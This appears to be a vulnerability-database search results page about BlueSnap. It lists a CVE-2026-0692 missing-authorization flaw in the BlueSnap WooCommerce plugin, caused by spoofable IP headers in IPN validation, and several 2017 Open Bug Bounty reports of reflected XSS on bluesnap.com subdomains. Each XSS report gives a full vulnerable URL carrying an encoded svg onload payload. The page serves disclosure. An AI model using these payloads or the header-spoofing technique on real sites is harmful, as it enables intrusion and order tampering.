20 matches found
WordPress BlueSnap Payment Gateway for WooCommerce plugin <= 3.3.0 - Missing Authorization to Unauthenticated Arbitrary Order Status Manipulation vulnerability
Missing Authorization to Unauthenticated Arbitrary Order Status Manipulation vulnerability discovered by Md. Moniruzzaman Prodhan NomanProdhan - Knight Squad in WordPress Plugin BlueSnap Payment Gateway for WooCommerce versions = 3.3.0...
CVE-2026-0692
The BlueSnap Payment Gateway for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.4.0. This is due to the plugin relying on WooCommerce's WCGeolocation::getipaddress function to validate IPN requests, which trusts user-controllable...
CVE-2026-0692
The BlueSnap Payment Gateway for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.4.0. This is due to the plugin relying on WooCommerce's WCGeolocation::getipaddress function to validate IPN requests, which trusts user-controllable...
CVE-2026-0692
The CVE-2026-0692 entry concerns the BlueSnap Payment Gateway for WooCommerce WordPress plugin. Affected component: the plugin (up to version 3.3.0). Root cause: it validates IPN requests by relying on WooCommerce’s WC_Geolocation::get_ip_address(), which trusts user-controllable headers (e.g., X...
CVE-2026-0692 BlueSnap Payment Gateway for WooCommerce <= 3.4.0 - Missing Authorization to Unauthenticated Arbitrary Order Status Manipulation
The BlueSnap Payment Gateway for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.4.0. This is due to the plugin relying on WooCommerce's WCGeolocation::getipaddress function to validate IPN requests, which trusts user-controllable...
CVE-2026-0692 BlueSnap Payment Gateway for WooCommerce <= 3.4.0 - Missing Authorization to Unauthenticated Arbitrary Order Status Manipulation
The BlueSnap Payment Gateway for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.4.0. This is due to the plugin relying on WooCommerce's WCGeolocation::getipaddress function to validate IPN requests, which trusts user-controllable...
WordPress plugin BlueSnap Payment Gateway for WooCommerce 安全漏洞
WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blog platform developed using the PHP language. This platform allows users to create personal blog websites on servers based on PHP and MySQL. A WordPress plugin is an application that can be installed t...
PT-2026-8048
The BlueSnap Payment Gateway for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.3.0. This is due to the plugin relying on WooCommerce's WC Geolocation::get ip address function to validate IPN requests, which trusts user-controllable...
sandbox.bluesnap.com XSS vulnerability
Vulnerable URL: https://sandbox.bluesnap.com/jsp/buynow.jsp?contractId=2259275&custom1;==USD&custom2;=%27%22--!%3E%3Csvg/onload=prompt/OPENBUGBOUNTY/%3E&custom4;=KNOXSS Details: Description| Value ---|--- Patched:| Yes, at 25.08.2017 Latest check for patch:| 25.08.2017 15:48 GMT Vulnerability...
download.bluesnap.com XSS vulnerability
Vulnerable URL: https://download.bluesnap.com/jsp/buynow.jsp?contractId=3209254=939126&custom2;=Y&custom3;=Comodo&custom6;=%22--!%3E%3Csvg/onload=prompt/OPENBUGBOUNTY/%3E Details: Description| Value ---|--- Patched:| Yes, at 28.08.2017 Latest check for patch:| 28.08.2017 09:53 GMT Vulnerability...
wwww.bluesnap.com XSS vulnerability
Vulnerable URL: https://wwww.bluesnap.com/jsp/buynow.jsp?contractId=3209254=939126&custom2;=Y&custom3;=Comodo&custom6;=%22--!%3E%3Csvg/onload=prompt/OPENBUGBOUNTY/%3E Details: Description| Value ---|--- Patched:| Yes, at 28.08.2017 Latest check for patch:| 28.08.2017 09:53 GMT Vulnerability type:...
speedbit.bluesnap.com XSS vulnerability
Vulnerable URL: https://speedbit.bluesnap.com/jsp/buynow.jsp?contractId=3209254=939126&custom2;=Y&custom3;=Comodo&custom6;=%22--!%3E%3Csvg/onload=prompt/OPENBUGBOUNTY/%3E Details: Description| Value ---|--- Patched:| Yes, at 28.08.2017 Latest check for patch:| 28.08.2017 09:53 GMT Vulnerability...
iknowfirst.bluesnap.com XSS vulnerability
Vulnerable URL: https://iknowfirst.bluesnap.com/jsp/buynow.jsp?contractId=3209254=939126&custom2;=Y&custom3;=Comodo&custom6;=%22--!%3E%3Csvg/onload=prompt/OPENBUGBOUNTY/%3E Details: Description| Value ---|--- Patched:| Yes, at 28.08.2017 Latest check for patch:| 28.08.2017 09:52 GMT Vulnerability...
smartftp.bluesnap.com XSS vulnerability
Vulnerable URL: https://smartftp.bluesnap.com/jsp/buynow.jsp?contractId=3209254=939126&custom2;=Y&custom3;=Comodo&custom6;=%22--!%3E%3Csvg/onload=prompt/OPENBUGBOUNTY/%3E Details: Description| Value ---|--- Patched:| Yes, at 29.08.2017 Latest check for patch:| 29.08.2017 05:39 GMT Vulnerability...
cp.bluesnap.com XSS vulnerability
Vulnerable URL: https://cp.bluesnap.com/jsp/buynow.jsp?contractId=3209254=939126&custom2;=Y&custom3;=Comodo&custom6;=%22--!%3E%3Csvg/onload=prompt/OPENBUGBOUNTY/%3E Details: Description| Value ---|--- Patched:| Yes, at 28.08.2017 Latest check for patch:| 28.08.2017 09:52 GMT Vulnerability type:|...
powermapper.bluesnap.com XSS vulnerability
Vulnerable URL: https://powermapper.bluesnap.com/jsp/buynow.jsp?contractId=3209254=939126&custom2;=Y&custom3;=Comodo&custom6;=%22--!%3E%3Csvg/onload=prompt/OPENBUGBOUNTY/%3E Details: Description| Value ---|--- Patched:| Yes, at 28.08.2017 Latest check for patch:| 28.08.2017 09:52 GMT Vulnerabilit...
www3.bluesnap.com XSS vulnerability
Vulnerable URL: https://www3.bluesnap.com/jsp/buynow.jsp?contractId=3209254=939126&custom2;=Y&custom3;=Comodo&custom6;=%22--!%3E%3Csvg/onload=prompt/OPENBUGBOUNTY/%3E Details: Description| Value ---|--- Patched:| Yes, at 28.08.2017 Latest check for patch:| 28.08.2017 09:53 GMT Vulnerability type:...
bluesnap.com XSS vulnerability
Vulnerable URL: https://www.bluesnap.com/jsp/buynow.jsp?contractId=3209254=939126&custom2;=Y&custom3;=Comodo&custom6;=%22--!%3E%3Csvg/onload=prompt/OPENBUGBOUNTY/%3E Details: Description| Value ---|--- Patched:| Yes, at 28.08.2017 Latest check for patch:| 28.08.2017 09:53 GMT Vulnerability type:|...
checkout.bluesnap.com XSS vulnerability
Vulnerable URL: https://checkout.bluesnap.com/jsp/buynow.jsp?contractId=3209254=939126&custom2;=Y&custom3;=Comodo&custom6;=%22--!%3E%3Csvg/onload=prompt/OPENBUGBOUNTY/%3E Details: Description| Value ---|--- Patched:| Yes, at 28.08.2017 Latest check for patch:| 28.08.2017 09:53 GMT Vulnerability...
comodo.bluesnap.com XSS vulnerability
Vulnerable URL: https://comodo.bluesnap.com/jsp/buynow.jsp?contractId=3209254=939126&custom2;=Y&custom3;=Comodo&custom6;=%22--!%3E%3Csvg/onload=prompt/OPENBUGBOUNTY/%3E Details: Description| Value ---|--- Patched:| Yes, at 28.08.2017 Latest check for patch:| 28.08.2017 09:53 GMT Vulnerability...